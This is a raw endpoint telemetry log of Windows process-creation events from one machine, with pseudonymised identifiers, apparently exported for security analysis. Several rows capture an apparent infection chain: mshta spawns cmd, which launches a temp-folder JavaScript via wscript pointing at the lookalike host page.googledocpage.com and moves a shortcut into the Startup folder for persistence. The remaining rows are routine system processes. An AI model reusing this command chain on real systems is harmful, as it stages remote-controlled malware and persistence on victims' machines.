+7,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:19.940278900+00:00,2528,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:19.930804700+00:00,19856,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 2 & move ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_d143d4ad31fa3d7d15a5fb448bcdb779cf11429b.lnk"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\""",False,2021-06-23 03:08:14.269528900+00:00,7948,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:20.166563800+00:00,2021-06-23 03:10:43.818024400+00:00,baf21b8c-f31f-4d5b-beab-7aafdc16876e,computerpii_0a470890c60768167990033d701e7bd881398861,160880,False,10.7740.19041.1052,False,11540474045172982,,11540474045172984,2021-06-23 03:08:19.930804700+00:00,19856,2021-06-23 03:08:19.930804700+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,19856,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+8,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:20.130569400+00:00,16132,msedge.exe,"""msedge.exe"" --type=crashpad-handler ""--user-data-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler ""--database=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data\Crashpad"" ""--metrics-dir=C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Edge\User Data"" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=91.0.4472.114 ""--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"" --annotation=plat=Win64 ""--annotation=prod=Microsoft Edge"" --annotation=ver=91.0.864.54 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbde0806f8,0x7ffbde080708,0x7ffbde080718",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:19.936127900+00:00,5924,msedge.exe,"""msedge.exe"" --single-argument https://drive.google.com/file/d/1TDk3O5c-rObQ4pO6LmitCFduw1OqW1SK/view",False,2021-06-23 03:08:19.770401500+00:00,20156,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:20.378135+00:00,2021-06-23 03:10:43.818159600+00:00,4241ca03-0330-489e-a4a7-626e3a2a88f9,computerpii_0a470890c60768167990033d701e7bd881398861,160883,False,10.7740.19041.1052,False,11540474045172983,,11540474045172985,2021-06-23 03:08:19.936127900+00:00,5924,2021-06-23 03:08:19.936127900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,5924,18560,TerminateProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,10.0,1.0,,256.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+9,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:20.325598500+00:00,3840,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 ",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:19.930804700+00:00,19856,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 2 & move ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_d143d4ad31fa3d7d15a5fb448bcdb779cf11429b.lnk"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\""",False,2021-06-23 03:08:14.269528900+00:00,7948,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:20.413221100+00:00,2021-06-23 03:10:43.818208200+00:00,6d7dd6c4-e35d-46b3-9f23-6fe7cb64afcb,computerpii_0a470890c60768167990033d701e7bd881398861,160884,False,10.7740.19041.1052,False,11540474045172982,,11540474045172986,2021-06-23 03:08:19.930804700+00:00,19856,2021-06-23 03:08:19.930804700+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,19856,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+10,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:08:20.358113200+00:00,18668,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 2 ",PortableExecutable,2019-12-07 09:09:07.254980200+00:00,C:\Windows\System32\wscript.exe,170496,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:19.930804700+00:00,19856,cmd.exe,"""cmd.exe"" /c start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 & start /b wscript ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 2 & move ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_d143d4ad31fa3d7d15a5fb448bcdb779cf11429b.lnk"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\""",False,2021-06-23 03:08:14.269528900+00:00,7948,\Device\HarddiskVolume3\Windows\System32\mshta.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:08:20.416983400+00:00,2021-06-23 03:10:43.818254700+00:00,664d5509-ede9-46d8-8b14-84b7efd3f3e2,computerpii_0a470890c60768167990033d701e7bd881398861,160885,False,10.7740.19041.1052,False,11540474045172982,,11540474045172987,2021-06-23 03:08:19.930804700+00:00,19856,2021-06-23 03:08:19.930804700+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,19856,128,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,0.0,1.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host
+11,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 08:11:29.498931200+00:00,6484,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 0D06DAA1-3D91-9043-67EB-EAE325E8CF8B ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 08:11:30.324174500+00:00,2021-06-24 08:12:26.246669200+00:00,30d15f76-5371-445a-bb2c-915a37cc94c7,computerpii_0a470890c60768167990033d701e7bd881398861,177549,False,10.7740.19041.1052,False,11540474045145394,,11540474045177286,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+12,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:54:43.626533200+00:00,15744,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 7F28197E-5BC3-5240-7AC8-7D34F23640C9 ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:54:43.651247400+00:00,2021-06-24 03:55:20.468822+00:00,c0083d1f-87ce-4dad-b53e-d81d82af0f99,computerpii_0a470890c60768167990033d701e7bd881398861,175268,False,10.7740.19041.1052,False,11540474045145394,,11540474045176442,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,16512,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+13,False,Medium,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:23.181291800+00:00,1684,SearchFilterHost.exe,"""SearchFilterHost.exe"" 0 816 820 828 8192 824 800 ",PortableExecutable,2021-06-09 01:20:40.727903+00:00,C:\Windows\System32\SearchFilterHost.exe,272384,ebf92961aa0ccc0ac803fdfa859d85d4,09a2cd711fd5076160ff590fcbc83ce4fc422c89e7373373cf3eda471c6d819a,4b51f519b24b0ea0e113973e5a65b3ba86517ac2,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:23.584909500+00:00,2021-06-24 00:55:46.434391800+00:00,77b8595b-81e2-49fd-8d13-d5fdf7884493,computerpii_0a470890c60768167990033d701e7bd881398861,168655,False,10.7740.19041.1052,False,11540474045144190,,11540474045175271,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchFilterHost.exe,SearchFilterHost.exe,Microsoft Windows Search Filter Host
+14,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:53:28.004027900+00:00,16444,SystemSettings.exe,"""SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel",PortableExecutable,2021-06-09 01:21:17.274789100+00:00,C:\Windows\ImmersiveControlPanel\SystemSettings.exe,97056,492494461fad3508358de1ac7b55190c,242f6e2b27a972efbcca6782bb784f80a99e4b317062eb7286bf344bc65c64e1,873a59d217f0b2b25dfdfd0e4244c9fa250340d0,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:28.045110200+00:00,2021-06-24 00:55:46.434792600+00:00,7bbb7722-8913-4c7a-81fe-2eb4b1a1b67a,computerpii_0a470890c60768167990033d701e7bd881398861,168663,False,10.7740.19041.1052,False,11540474045136908,,11540474045175272,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,Settings,SystemSettings.exe,Settings
+15,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:53:28.006331700+00:00,5268,ApplicationFrameHost.exe,ApplicationFrameHost.exe -Embedding,PortableExecutable,2021-02-17 04:35:02.434563400+00:00,C:\Windows\System32\ApplicationFrameHost.exe,78456,d58a8a987a8dafad9dc32a548cc061e7,cf58e424b86775e6f2354291052126a646f842fff811b730714dfbbd8ebc71a4,f79fc9e0ab066cad530b949c2153c532a5223156,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:28.045715+00:00,2021-06-24 00:55:46.434827700+00:00,0b0c4179-2070-486e-b0c1-667a47b07a74,computerpii_0a470890c60768167990033d701e7bd881398861,168664,False,10.7740.19041.1052,False,11540474045136908,,11540474045175273,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,Application Frame Host,ApplicationFrameHost.exe,Application Frame Host
+16,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:53:42.530643200+00:00,10236,OfficeC2RClient.exe,"""OfficeC2RClient.exe"" /WatchService",PortableExecutable,2021-06-12 08:56:59.029539+00:00,C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe,23080816,0dc113fc1d718e1951bb9c59f2ac9547,1c8f95ff4650c68fffc16576e905462a6b8e1b965156073701c8ab7732a06367,78627ab451d9269178de0c336d68bdb14475501b,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:53:42.783577300+00:00,2021-06-24 00:55:46.436677700+00:00,9d80d5c1-8156-4de4-8c32-186b49b9e0b2,computerpii_0a470890c60768167990033d701e7bd881398861,168717,False,10.7740.19041.1052,False,11540474045136925,,11540474045175282,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20688,OfficeC2RClient.exe,OfficeC2RClient.exe,Microsoft Office Click-to-Run Client
